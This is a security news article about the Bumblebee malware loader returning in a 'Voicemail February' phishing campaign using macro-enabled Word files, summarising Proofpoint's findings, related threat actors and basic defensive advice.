The notorious Bumblebee loader has made a comeback in the threat landscape hive following a four-month hiatus, with a newly identified email campaign targeting thousands of organizations in the US. Initially appearing in March 2022, Bumblebee was utilized by numerous cybercriminal groups to distribute a variety of payloads including infostealers, banking Trojans, and post-compromise tools. However, it disappeared from researchers’ radar until its recent resurgence.
The Proofpoint Threat Research Team revealed the latest campaign in a recent blog post, detailing an onslaught of emails with the subject “Voicemail February” sent from the sender “info@quarlesaa[.]com”. These emails contain malicious Microsoft OneDrive URLs which lead to a Word file masquerading as being from the consumer electronics company Humane. The attack vector ultimately works by utilizing a PowerShell command to download and run a Bumblebee DLL file, facilitating further malicious activity.
The return of the loader is viewed as an indicator of a surge in cybercriminal threat activity this year, following a lull during the winter months. This resurgence aligns with the resurfacing of other malicious groups, such as post-exploitation operator TA582, aviation and aerospace-targeting actor TA2541, and the return of email campaigns delivered by TA571 that deliver the DarkGate malware, among others.
When compared to previous campaigns using Bumblebee, the recent campaign is distinguished by its use of VBA macro-enabled documents – an uncommon tactic employed by threat actors since Microsoft began blocking macros by default since 2022 to thwart malicious activity. The Word document in the recent campaign uses macros to create a script in the Windows temporary directory, executed by using the “wscript” utility, which then downloads and executes the next stage from a remote server.
The attack chains used in previous Bumblebee campaigns were notably different, with strategies like emails containing URLs leading to the download of a DLL, or HTML attachments that exploited HTML smuggling to drop a RAR file. These campaigns leveraged zipped, password-protected VBS attachments or zipped LNK files to download and execute the loader, highlighting the versatility and adaptability of the threat actors behind Bumblebee.
Although the recent Bumblebee campaign has not been attributed to any tracked threat actor, the firm included a list of indicators of compromise (IoC) to aid threat-hunting and urged organizations to be cautious of the hallmarks noted above. Additionally, the researchers emphasized the use of basic security best practices to avoid compromise by malicious email campaigns, such as conducting employee training to identify phishing and implementing email security-scanning software that flags suspicious messages.
In conclusion, the resurgence of the Bumblebee loader, along with other malicious groups, marks a concerning increase in cybercriminal threat activity in 2024. The rapid evolution of attack strategies and the adaptability of these threat actors emphasize the need for organizations to remain vigilant and proactive in defending against these persistent and sophisticated threats.